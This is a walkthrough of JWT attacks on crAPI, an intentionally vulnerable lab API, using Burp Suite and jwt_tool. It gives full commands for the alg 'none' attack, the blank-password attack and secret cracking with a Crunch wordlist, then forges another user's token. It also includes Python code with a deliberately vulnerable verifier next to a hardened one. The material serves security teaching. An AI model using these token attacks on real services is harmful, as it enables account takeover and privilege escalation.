API Token Attacks focusing on JSON Web Token (JWT) Attacks (crAPI as an Example)

Ammar Ahmed
5 min read, Feb 11, 2024


JSON Web Token

Many APIs use JSON Web Tokens (JWT) for authentication and authorization.

JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact, self-contained way of securely transmitting information between parties as a JSON object.

We will continue with crAPI as our target and send the login request to Burp.

Sending login request to Burp

Then we send the request to Burp Sequencer.

Sending the request to Sequencer in Burp

In Sequencer we choose a custom token location so that the bearer token in the response is the value being sampled.

Custom Token Location in Burp Sequencer
Custom Location in Token Location

Then we start the live capture.

Start live capture

We can turn "Auto analyze" on.

Putting Auto analyze on

We wait until the capture finishes and then press Analyze.

After the analysis completes, the summary shows that the overall quality of randomness is extremely poor.

Analysis Summary

We can dig deeper into the analysis to find more interesting information.

After this we can save the tokens and take a look at them.

Saving the Tokens we got from analysis

We can see that the tokens share large common parts,

Seeing Similarities in Tokens

which means the differing positions could be brute-forced with Intruder in Burp Suite to produce valid tokens.

From here we will try some attacks on JWT (JSON Web Tokens).

First we authenticate and look at the token.

JWTs are encoded with Base64 (the URL-safe base64url variant, without padding),

and we can see the token in the response as follows:

Bearer Token

How do we know that it is a JWT? There are two ways to check:

First, by going to jwt.io and pasting the token we got.

JWT analysis using JWT.io

As we can see, the token has three main parts: header, payload and signature.

The second method is to pipe it to the base64 decoder built into Kali, or to use Burp Suite's Decoder.

Decoding Bearer Token using Base64

In a JWT the three parts are separated by a dot (.).
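To see what the second method reveals in code, here is an added, stdlib-only Python inspector (my example, not from the post or from crAPI) that splits the page's own bearer token on the dots, decodes header and payload, and lists the things a reviewer should look at; inspect_jwt and its findings are my naming.

```python
import base64
import json
import time
from typing import Optional

# Bearer token from the crAPI login response shown above (copied from the page).
PAGE_TOKEN = (
    "eyJhbGciOiJSUzI1NiJ9."
    "eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTIxOTI5LCJleHAiOjE2NzY3MjY3Mjl9."
    "Ft8SfGDz4LtOHo2kzTYOfK9VaaX7MAfz_YAXWxF8QC7OgRFE2jaM18FzRdgmihbTk9gl993EBILXqGUbZ23bvLWU3SYH2GGwA0wmqPztl4KJYewT9u1YIQveu8jadsSFmLgy25y6NMebpP6VYjpOevHBbwyTmdWB_RQYqGYQJHUeIGVOkypxWL3w60rVPmqvQQHpxYX4Hoc_W7iEWQK5EROH5LZ7cgEpSvPBUHeybpc4jXJl8QxmI8r0IP2gY5SQtZHk6ry5RWXj-mMqblw6w2has_M9anqV7BE-AO-lkkJ1y1oqBfPqHJlY0hoyr1w6-jj7qJmZBUGV0L-15_MSMg"
)

def b64url_decode(segment: str) -> bytes:
    """JWT segments are base64url with the '=' padding stripped; restore it first."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def inspect_jwt(token: str, now: Optional[int] = None) -> dict:
    """Split on '.', decode header and payload, and report what to look at."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("a compact JWS has exactly three dot-separated parts")
    header = json.loads(b64url_decode(parts[0]))
    payload = json.loads(b64url_decode(parts[1]))
    signature = b64url_decode(parts[2])
    now = int(time.time()) if now is None else now
    findings = []
    alg = str(header.get("alg", ""))
    if alg.lower() == "none" or not signature:
        findings.append("unsigned token: alg none or empty signature")
    if alg.upper().startswith("HS"):
        findings.append("HMAC-signed: secret strength and key confusion are what to check")
    if "exp" not in payload:
        findings.append("no exp claim: token never expires")
    elif payload["exp"] <= now:
        findings.append("token is expired")
    if "exp" in payload and "iat" in payload:
        findings.append("lifetime %d s" % (payload["exp"] - payload["iat"]))
    return {
        "header": header,
        "payload": payload,
        "signature_bytes": len(signature),  # for RS256 this equals the RSA modulus size in bytes
        "findings": findings,
    }

if __name__ == "__main__":
    print(json.dumps(inspect_jwt(PAGE_TOKEN), indent=2))
```

Run against the page's token it shows the RS256 header, the sub/role/iat/exp claims and a seven-day lifetime; the same function flags an alg "none" token or a missing exp immediately.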

From here we use jwt_tool to analyse and attack the token.

First we analyse it in Playbook mode; the command is as follows:

# jwt_tool -t http://127.0.0.1:8888/identity/api/v2/user/dashboard -rh "Authorization: Bearer eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTIxOTI5LCJleHAiOjE2NzY3MjY3Mjl9.Ft8SfGDz4LtOHo2kzTYOfK9VaaX7MAfz_YAXWxF8QC7OgRFE2jaM18FzRdgmihbTk9gl993EBILXqGUbZ23bvLWU3SYH2GGwA0wmqPztl4KJYewT9u1YIQveu8jadsSFmLgy25y6NMebpP6VYjpOevHBbwyTmdWB_RQYqGYQJHUeIGVOkypxWL3w60rVPmqvQQHpxYX4Hoc_W7iEWQK5EROH5LZ7cgEpSvPBUHeybpc4jXJl8QxmI8r0IP2gY5SQtZHk6ry5RWXj-mMqblw6w2has_M9anqV7BE-AO-lkkJ1y1oqBfPqHJlY0hoyr1w6-jj7qJmZBUGV0L-15_MSMg" -M pb

using JWT_tool to perform attacks

Playbook results

JWT Playbook results

jwt_tool tries different kinds of attacks, such as password attacks.

Different Password attacks using JWT_tool

We can also run the algorithm "none" attack with jwt_tool:

# jwt_tool eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTIxOTI5LCJleHAiOjE2NzY3MjY3Mjl9.Ft8SfGDz4LtOHo2kzTYOfK9VaaX7MAfz_YAXWxF8QC7OgRFE2jaM18FzRdgmihbTk9gl993EBILXqGUbZ23bvLWU3SYH2GGwA0wmqPztl4KJYewT9u1YIQveu8jadsSFmLgy25y6NMebpP6VYjpOevHBbwyTmdWB_RQYqGYQJHUeIGVOkypxWL3w60rVPmqvQQHpxYX4Hoc_W7iEWQK5EROH5LZ7cgEpSvPBUHeybpc4jXJl8QxmI8r0IP2gY5SQtZHk6ry5RWXj-mMqblw6w2has_M9anqV7BE-AO-lkkJ1y1oqBfPqHJlY0hoyr1w6-jj7qJmZBUGV0L-15_MSMg -X a

Performing None algorithm attack using JWT_tool

We try to use these tokens for authentication, but the vulnerability is patched and we get a 404 error.

None algorithm Patched vulnerability getting 404

We can also try the blank password attack:

# jwt_tool eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTIxOTI5LCJleHAiOjE2NzY3MjY3Mjl9.Ft8SfGDz4LtOHo2kzTYOfK9VaaX7MAfz_YAXWxF8QC7OgRFE2jaM18FzRdgmihbTk9gl993EBILXqGUbZ23bvLWU3SYH2GGwA0wmqPztl4KJYewT9u1YIQveu8jadsSFmLgy25y6NMebpP6VYjpOevHBbwyTmdWB_RQYqGYQJHUeIGVOkypxWL3w60rVPmqvQQHpxYX4Hoc_W7iEWQK5EROH5LZ7cgEpSvPBUHeybpc4jXJl8QxmI8r0IP2gY5SQtZHk6ry5RWXj-mMqblw6w2has_M9anqV7BE-AO-lkkJ1y1oqBfPqHJlY0hoyr1w6-jj7qJmZBUGV0L-15_MSMg -X b

JWT_tool Blank Password attack
JWT_Tool Blank Password Creation

We try this token the same way as the previous one:

We got 200 OK with this Blank Password Token

As we can see, we get in with the blank password token.

From here we try a cracking attack on the secret key.

First we create a wordlist using Crunch:

# crunch 5 5 -o crapipw.txt

Creating a Wordlist using Crunch

Then we feed the wordlist to jwt_tool in crack mode:

# jwt_tool eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbWFAYW1hLmNvbSIsInJvbGUiOiJ1c2VyIiwiaWF0IjoxNjc2MTI0NjM5LCJleHAiOjE2NzY3Mjk0Mzl9.WkfD20dmgVLa1rWZ3anpsSjjO5raVXiokiSqV8BIMiIZTQAFEpdTUe3zWoOf-JvUB1mMbkXkD_Mzk70sh88_-PLQoyuoE_rgvTWzHdZFh5jXwDjC5JengUwCYhI6szGULvT5pe0iyAWvu2TWYZ_-3HuqtazoSY20LDzVCYpR11Jpei5NENvxMisce9m0EL0qqlmUMJMjHvRem-indK7GJZ5GcubD83O9QL_4Kr2iYlm5257_x4XR7Jh7PqM00YprgaX-ND6w351GYwO4LmUs4kGhiTlLZpVPpBo33BNLgvdwSf2mHcZmWL_erEBpik4RDlXPf9FE8KfHR_KIDtXkvg -C -d crapipw.txt

Finding the Secret Key

From here we can create our own tokens that the server will trust.

First we take another user's email,

then go to jwt.io and create a new token signed with the recovered secret key.

Creating new Tokens using the Secret Key

Then we try it in Postman.

Using our made-up token

So that is how we crack the secret key.
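The none-algorithm, blank-password and secret-cracking attacks above only work when the server lets the token choose its own algorithm or runs with a blank or weak HMAC secret. As an added example that is not crAPI's code (it uses HS256 with the standard library while crAPI's token is RS256; the secret, the mint() helper and the verifier names are constructed for illustration), here is a naive verifier beside a hardened one, so the same forged tokens jwt_tool produced can be checked against both:

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))

def mint(payload: dict, secret: bytes, alg: str = "HS256") -> str:
    """Build a compact JWT; alg='none' gives the unsigned form jwt_tool -X a produces."""
    signing_input = b64url(json.dumps({"alg": alg}).encode()) + "." + b64url(json.dumps(payload).encode())
    if alg == "none":
        return signing_input + "."
    return signing_input + "." + b64url(hmac.new(secret, signing_input.encode(), hashlib.sha256).digest())

def verify_naive(token: str, secret: bytes) -> Optional[dict]:
    """Vulnerable: honours the alg chosen by the token and whatever secret it was configured with."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header["alg"] == "none":                      # unsigned tokens accepted as-is
        return json.loads(b64url_decode(p))
    mac = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return json.loads(b64url_decode(p)) if b64url(mac) == s else None   # non-constant-time compare

def verify_hardened(token: str, secret: bytes, now: Optional[int] = None) -> Optional[dict]:
    """Pins HS256, refuses blank/short secrets, compares in constant time, checks exp."""
    if len(secret) < 32:                             # RFC 7518 3.2: HS256 keys must be >= 256 bits
        raise ValueError("HS256 secret must be at least 32 bytes; refuse to start")
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        payload = json.loads(b64url_decode(p))
    except ValueError:                               # wrong part count, bad base64 or bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":   # token never picks the alg
        return None
    expected = b64url(hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(expected, s):
        return None
    now = int(time.time()) if now is None else now
    if not isinstance(payload, dict) or not isinstance(payload.get("exp"), int) or payload["exp"] <= now:
        return None
    return payload
```

With the page's claims as payload, verify_naive accepts a role=admin token signed with alg none, and a server configured with an empty secret accepts a role=admin token signed with that empty secret, while verify_hardened rejects both and refuses to run with a short secret at all.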

As we can see, if the JWT implementation is weak and the secret key is not strong enough, we can perform many attacks and possibly create our own tokens. We also learned to use jwt_tool and Burp Suite to attack API tokens and try to gain access or escalate our privileges in the API.
